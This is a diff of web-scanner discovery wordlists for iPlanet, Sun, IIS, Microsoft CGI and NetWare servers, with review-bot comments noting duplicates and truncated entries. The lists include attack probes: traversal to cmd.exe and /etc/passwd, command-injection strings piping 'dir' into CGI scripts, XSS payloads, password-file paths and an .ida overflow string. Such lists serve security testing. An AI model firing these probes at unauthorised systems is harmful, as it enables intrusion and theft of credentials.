@ -0,0 +1,36 @@
|
|||
?Publisher
|
||||
?wp-cs-dump
|
||||
?wp-html-rend
|
||||
?wp-start-ver
|
||||
?wp-stop-ver
|
||||
?wp-uncheckout
|
||||
?wp-usr-prop
|
||||
?wp-ver-diff
|
||||
?wp-ver-info
|
||||
?wp-verify-link
|
||||
admin-serv
|
||||
admin-serv/config/admpw
|
||||
admpw
|
||||
agents
|
||||
bin
|
||||
ca
|
||||
ca
|
||||
cgi-bin
|
||||
config
|
||||
dirb_random.cgi
|
||||
dirb_random.jsp
|
||||
dirb_random.shtml
|
||||
docs
|
||||
dsgw
|
||||
help
|
||||
index.html
|
||||
jsp
|
||||
manual
|
||||
mc-icons
|
||||
netshare
|
||||
ns-icons
|
||||
publisher
|
||||
search
|
||||
search-ui
|
||||
servlet
|
||||
servlets
|
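Review bot: `ca` is added twice, and `dirb_random.cgi`, `dirb_random.jsp` and `dirb_random.shtml` carry another tool's name and look like its not-found probes rather than iPlanet resources. Drop the duplicate and confirm the three `dirb_random.*` entries belong in a product-specific list; if they are kept as baseline requests for detecting custom 404 handling, say so in a comment.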
51
discovery/unix/interesting-files-sun-app-server.txt
Normal file
|
@ -0,0 +1,51 @@
|
|||
ias-samples
|
||||
ias-samples/index.html
|
||||
index.html
|
||||
cgi-bin
|
||||
cgi-bin/gx.cgi
|
||||
cgi-bin/gx.dll
|
||||
cgi-bin/gx.exe
|
||||
gx
|
||||
gx.cgi
|
||||
gx.exe
|
||||
GXApp
|
||||
GXApp/index.html
|
||||
GXApp/COnlineBank
|
||||
GXApp/COnlineBank/COBLogin.html
|
||||
GXApp/CSample
|
||||
GXApp/CSample/index.html
|
||||
GXApp/images
|
||||
GXApp/OnlineBank
|
||||
GXApp/OnlineBank/OBLogin.html
|
||||
fortune
|
||||
NASApp/fortune/fortune
|
||||
lotery
|
||||
COnlineBank
|
||||
CSample
|
||||
OnlineBank
|
||||
NASApp
|
||||
NASApp/system
|
||||
NASApp/system/ValidationError.jsp
|
||||
NASApp/system/ExceptionThrown.jsp
|
||||
NASApp/system/JSPRunner
|
||||
NASApp/system/JSPRunnerSticky
|
||||
NASApp/system/SessionInvalidator
|
||||
NASApp/system/StaticServlet
|
||||
NASApp/system/WelcomeListServlet
|
||||
NASApp/system/FormAuthServlet
|
||||
NASApp/system/CertAuthServlet
|
||||
NASApp/system/BasicAuthServlet
|
||||
system
|
||||
ValidationError.jsp
|
||||
ExceptionThrown.jsp
|
||||
JSPRunner
|
||||
JSPRunnerSticky
|
||||
SessionInvalidator
|
||||
StaticServlet
|
||||
WelcomeListServlet
|
||||
FormAuthServlet
|
||||
CertAuthServlet
|
||||
BasicAuthServlet
|
||||
com.netscape.server.servlet.jsp.JSPRunner
|
||||
servlet
|
||||
classes
|
6
discovery/win/cgi-HTTP-POST-reqd-microsoft.txt
Normal file
|
@ -0,0 +1,6 @@
|
|||
_vti_bin/shtml.dll/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||||
_vti_bin/shtml.exe/_vti_rpc?method=server+version%3a4%2e0%2e2%2e2611
|
||||
_vti_bin/_vti_aut/author.dll?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
|
||||
_vti_bin/_vti_aut/author.exe?method=list+documents%3a3%2e0%2e2%2e1706&service%5fname=&listHiddenDocs=true&listExplorerDocs=true&listRecurse=false&listFiles=true&listFolders=true&listLinkInfo=true&listIncludeParent=true&listDerivedT=false&listBorders=fals
|
||||
admin/db.php
|
||||
_vti_bin/shtml.dll/_vti_rpc
|
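Review bot: both `author.dll` and `author.exe` entries end in `listBorders=fals`, which looks like a truncated `listBorders=false`, so the last parameter of each request is probably not what was intended. Restore the full value or trim the query back to the last complete parameter. `admin/db.php` also stands out in a file named for Microsoft CGI resources and has no comment explaining why it needs POST.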
78
discovery/win/cgi-microsoft.txt
Normal file
|
@ -0,0 +1,78 @@
|
|||
# on windows, cgi dir is usually /scripts /cgi /cgi-bin, but could be named anything.
|
||||
/cart32.exe
|
||||
/get32.exe
|
||||
/visadmin.exe
|
||||
/foxweb.exe
|
||||
/webplus.exe?about
|
||||
/fpsrvadm.exe
|
||||
/MsmMask.exe
|
||||
/cmd.exe?/c+dir
|
||||
/cmd1.exe?/c+dir
|
||||
/post32.exe|dir%20c:\\
|
||||
/cgitest.exe
|
||||
/hpnst.exe?c=p+i=
|
||||
/Pbcgi.exe
|
||||
/testcgi.exe
|
||||
/webfind.exe?keywords=01234567890123456789
|
||||
/redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C
|
||||
/test-cgi.exe?<script>alert(document.cookie)</script>
|
||||
/athcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['
|
||||
/mkilog.exe
|
||||
/mkplog.exe
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/MsmMask.exe?mask=/junk334
|
||||
/perl.exe?-v
|
||||
/perl.exe
|
||||
/ppdscgi.exe
|
||||
/c32web.exe/ChangeAdminPassword
|
||||
/windmail.exe
|
||||
/dbmlparser.exe
|
||||
/cgimail.exe
|
||||
/minimal.exe
|
||||
/rguest.exe
|
||||
/visitor.exe
|
||||
/webbbs.exe
|
||||
/wguest.exe
|
||||
//_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15
|
||||
/cfgwiz.exe
|
||||
/Cgitest.exe
|
||||
/mailform.exe
|
||||
/post16.exe
|
||||
/imagemap.exe
|
||||
/htimage.exe/path/filename?2,2
|
||||
/htimage.exe
|
||||
/Webnews.exe
|
||||
/texis.exe/junk
|
||||
/apexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/
|
||||
/sensepost.exe?/c+dir
|
||||
/testcgi.exe
|
||||
/testcgi.exe?<script>alert(document.cookie)</script>
|
||||
/ion-p.exe?page=c:\winnt\repair\sam
|
||||
/../../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
/NUL/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
/PRN/../../../../../../../../../WINNT/system32/ipconfig.exe
|
||||
/c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf
|
||||
/foxweb.dll
|
||||
/wconsole.dll
|
||||
/shtml.dll
|
||||
/scripts/slxweb.dll/getfile?type=Library&file=[invalid
|
||||
/filename]
|
||||
/rightfax/fuwww.dll/?
|
||||
/WINDMAIL.EXE?%20-n%20c:\boot.ini%
|
||||
/WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\
|
||||
/GW5/GWWEB.EXE
|
||||
/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA
|
||||
/GW5/GWWEB.EXE?HELP=bad-request
|
||||
/GWWEB.EXE?HELP=bad-request
|
||||
/echo.bat
|
||||
/echo.bat?&dir+c:\\
|
||||
/hello.bat?&dir+c:\\
|
||||
/input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
/input2.bat?|dir
|
||||
/input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
/test-cgi.bat
|
||||
/test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\
|
||||
/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,
|
|
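Review bot: the entry `/scripts/slxweb.dll/getfile?type=Library&file=[invalid` is split from its continuation `/filename]` on the next line, so a consumer that reads one request per line gets two broken entries. Join them into a single line. In the same hunk `/MsmMask.exe?mask=/junk334` is added five times and `/testcgi.exe` twice, and the final entry `/tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,` ends in a trailing comma that the similar `/test.bat?|dir...` line does not have; de-duplicate and check whether that comma is intended.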
@ -0,0 +1,2 @@
|
|||
# Interesting Microsoft IIS files which require being scanned for with the HTTP POST verb
|
||||
/msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName
|
163
discovery/win/interesting-files-microsoft-iis.txt
Normal file
|
@ -0,0 +1,163 @@
|
|||
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s.
|
||||
/.printer
|
||||
/%NETHOOD%/
|
||||
/<script>alert('XSS')</script>.aspx
|
||||
/AccessPlatform/
|
||||
/AccessPlatform/auth/
|
||||
/AccessPlatform/auth/clientscripts/cookies.js
|
||||
/AccessPlatform/auth/clientscripts/login.js
|
||||
/Exadmin/
|
||||
/ExchWeb/
|
||||
/Exchange/
|
||||
/Microsoft-Server-ActiveSync/
|
||||
/OMA/
|
||||
/OWA/
|
||||
/Public/
|
||||
/_layouts/alllibs.htm
|
||||
/_layouts/settings.htm
|
||||
/_layouts/userinfo.htm
|
||||
/_vti_bin/
|
||||
/_vti_bin/_vti_aut/fp30reg.dll
|
||||
/_vti_pvt/
|
||||
/_WEB_INF/
|
||||
/a%5c.aspx
|
||||
/adovbs.inc
|
||||
/aspnet_files/
|
||||
/certcontrol/
|
||||
/certenroll/
|
||||
/certsrv/
|
||||
/citrix/
|
||||
/citrix/AccessPlatform/auth/
|
||||
/citrix/AccessPlatform/auth/clientscripts/
|
||||
/AccessPlatform/auth/clientscripts/
|
||||
/Citrix//AccessPlatform/auth/clientscripts/cookies.js
|
||||
/Citrix/AccessPlatform/auth/clientscripts/login.js
|
||||
/Citrix/PNAgent/config.xml
|
||||
/exchange/root.asp
|
||||
/forum.asp
|
||||
/forum_arc.asp
|
||||
/forum_professionnel.asp
|
||||
/iisadmin/
|
||||
/iisadmpwd/achg.htr
|
||||
/iisadmpwd/aexp.htr
|
||||
/iisadmpwd/aexp2.htr
|
||||
/iisadmpwd/aexp2b.htr
|
||||
/iisadmpwd/aexp3.htr
|
||||
/iisadmpwd/aexp4.htr
|
||||
/iisadmpwd/aexp4b.htr
|
||||
/iisadmpwd/anot.htr
|
||||
/iisadmpwd/anot3.htr
|
||||
/iiasdmpwd/
|
||||
/iishelp/
|
||||
/iishelp/iis/misc/default.asp
|
||||
/iissamples/
|
||||
/imprimer.asp
|
||||
/includes/adovbs.inc
|
||||
/msadc/
|
||||
/null.htw
|
||||
/pbserver/pbserver.dll
|
||||
/postinfo.html
|
||||
/rubrique.asp
|
||||
/scripts/
|
||||
/scripts/fpcount.exe
|
||||
/scripts/cgimail.exe
|
||||
/scripts/tools/newdsn.exe
|
||||
/scripts/tools/getdrvs.exe
|
||||
/scripts/convert.bas
|
||||
/cgi-bin/htmlscript
|
||||
/scripts/counter.exe
|
||||
/scripts/no-such-file.pl
|
||||
/share/
|
||||
/tsweb/
|
||||
/~/<script>alert('XSS')</script>.asp
|
||||
/~/<script>alert('XSS')</script>.aspx
|
||||
/index.shtml
|
||||
/x.htw
|
||||
/x.ida
|
||||
/x.idq
|
||||
/cgi
|
||||
/scripts/iisadmin/ism.dll?http/dir
|
||||
/scripts/samples/search/webhits.exe
|
||||
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/_vti_bin/_vti_aut/fp30reg.dll
|
||||
/_vti_bin/_vti_aut/fp30reg.dll?1234=X
|
||||
/_vti_bin/shtml.dll/asdfghjkl
|
||||
/_vti_bin/shtml.exe/qwertyuiop
|
||||
/ajfhasdfgsagfakjhgd
|
||||
/cgi-bin/a1stats/a1disp.cgi
|
||||
/checkapache.html
|
||||
/qwertypoiu.printer
|
||||
/ASPSamp/AdvWorks/equipment/catalog_type.asp
|
||||
/Admin/knowledge/dsmgr/users/GroupManager.asp
|
||||
/Admin/knowledge/dsmgr/users/UserManager.asp
|
||||
/AdvWorks/equipment/catalog_type.asp
|
||||
/CFIDE/Administrator/startstop.html
|
||||
/Mail/smtp/Admin/smadv.asp
|
||||
/SiteServer/Admin
|
||||
/SiteServer/Admin/commerce/foundation/DSN.asp
|
||||
/SiteServer/Admin/commerce/foundation/driver.asp
|
||||
/SiteServer/Admin/knowledge/dsmgr/default.asp
|
||||
/SiteServer/Publishing/viewcode.asp
|
||||
/SiteServer/admin/findvserver.asp
|
||||
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
|
||||
/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
|
||||
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
|
||||
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
|
||||
/Sites/Samples/Knowledge/Push/ViewCode.asp
|
||||
/Sites/Samples/Knowledge/Search/ViewCode.asp
|
||||
/WEB-INF/web.xml
|
||||
/_AuthChangeUrl?
|
||||
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/_mem_bin/autoconfig.asp
|
||||
/_mem_bin/formslogin.asp
|
||||
/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/_vti_bin/_vti_aut/dvwssr.dll
|
||||
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
|
||||
/_vti_bin/shtml.dll
|
||||
/_vti_pvt/administrator.pwd
|
||||
/_vti_pvt/administrators.pwd
|
||||
/_vti_pvt/authors.pwd
|
||||
/_vti_pvt/service.pwd
|
||||
/_vti_pvt/shtml.exe
|
||||
/_vti_pvt/users.pwd
|
||||
/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/cgi-bin/htimage.exe?2,2
|
||||
/cgi-bin/imagemap.exe?2,2
|
||||
/clocktower
|
||||
/domcfg.nsf/?open
|
||||
/iisadmpwd/achg.htr
|
||||
/iisadmpwd/aexp.htr
|
||||
/iisadmpwd/aexp2.htr
|
||||
/iisadmpwd/aexp2b.htr
|
||||
/iisadmpwd/aexp3.htr
|
||||
/iisadmpwd/aexp4.htr
|
||||
/iisadmpwd/aexp4b.htr
|
||||
/iisadmpwd/anot.htr
|
||||
/iisadmpwd/anot3.htr
|
||||
/iissamples/exair/howitworks/Code.asp
|
||||
/iissamples/exair/howitworks/Codebrw1.asp
|
||||
/iissamples/exair/howitworks/Codebrws.asp
|
||||
/iissamples/sdk/asp/docs/CodeBrws.asp
|
||||
/iissamples/sdk/asp/docs/codebrw2.asp
|
||||
/iissamples/sdk/asp/docs/codebrws.asp
|
||||
/index.php
|
||||
/market
|
||||
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/msadc/Samples/selector/showcode.asp
|
||||
/msdac/root.exe?/c+dir
|
||||
/mspress30
|
||||
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
|
||||
/publisher
|
||||
/qwertypoiu.htw
|
||||
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
|
||||
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
|
||||
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
|
||||
/scripts/fpcount.exe
|
||||
/scripts/root.exe?/c+dir
|
||||
/scripts/tools/getdrvs.exe
|
||||
/scripts/tools/newdsn.exe
|
||||
/search?NS-query-pat=..\..\..\..\..\boot.ini
|
||||
/siteserver/publishing/viewcode.asp
|
||||
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
|
||||
/vc30
|
||||
/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
|
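Review bot: `/iiasdmpwd/` looks like a misspelling of `/iisadmpwd/`, the directory used by the `.htr` entries just above it, and `/msdac/root.exe?/c+dir` does not match the `/msadc/` spelling used everywhere else in the list; correct both unless the variants are deliberate. The nine `/iisadmpwd/*.htr` entries, `/_vti_bin/_vti_aut/fp30reg.dll`, `/scripts/fpcount.exe`, `/scripts/tools/newdsn.exe` and `/scripts/tools/getdrvs.exe` are each added twice. In the `/tools/newdsn.exe` entry, `..%2F..%2Fwwwroot%2goatfart.html` contains `%2g`, which is not a valid percent escape, and the line stops at `newdb=CREA`, so that request is malformed as committed.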
1670
discovery/win/interesting-files-microsoft-sharepoint.txt
Normal file
File diff suppressed because it is too large
60
discovery/win/interesting-files-netware.txt
Normal file
|
@ -0,0 +1,60 @@
|
|||
Aplicaciones
|
||||
EHS.Web
|
||||
Exchange
|
||||
ICHAIN
|
||||
ICHAINErrors
|
||||
ICHAINLogout
|
||||
ICS
|
||||
ICSIBroker
|
||||
ICSLogin
|
||||
NSearch
|
||||
NetStorage
|
||||
Portal
|
||||
SearchServlet
|
||||
apache
|
||||
aplicaciones
|
||||
bo
|
||||
eGuide
|
||||
eMFrame
|
||||
ed
|
||||
edgecgi
|
||||
edirectory
|
||||
eg
|
||||
eguide
|
||||
eis
|
||||
exteND
|
||||
extend
|
||||
fullpageservic
|
||||
home.html
|
||||
iFolder
|
||||
iManager
|
||||
ifolder
|
||||
im
|
||||
imanager
|
||||
index.html
|
||||
intranet
|
||||
iprint
|
||||
ndk
|
||||
ned
|
||||
nps
|
||||
nsadmin
|
||||
nsure
|
||||
oneNet
|
||||
pg
|
||||
portal
|
||||
portalservice
|
||||
principal
|
||||
quickfinder
|
||||
r3d
|
||||
service
|
||||
servlet
|
||||
site
|
||||
sms
|
||||
tomcat
|
||||
update
|
||||
vo
|
||||
voffice
|
||||
webacc
|
||||
webgui
|
||||
welcome
|
||||
wgate
|
BIN
docs/misc/Web-Shells-rev2.pdf
Normal file
Binary file not shown.
Some files were not shown because too many files have changed in this diff